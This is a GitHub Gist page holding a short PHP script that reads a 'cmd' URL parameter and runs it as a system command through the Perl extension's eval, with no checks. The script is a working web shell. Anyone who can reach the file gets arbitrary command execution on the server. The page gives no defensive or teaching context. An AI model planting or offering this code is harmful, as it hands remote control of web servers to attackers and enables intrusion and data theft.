Last active
September 4, 2019 09:27
-
-
Save haphan/aab37d5dc326e46f7d53cb9f0075676f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $perl=new perl(); | |
| $cmd=$_GET['cmd']; | |
| echo $perl->eval(sprintf("system('%s')", $cmd)); | |
| sleep(60); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment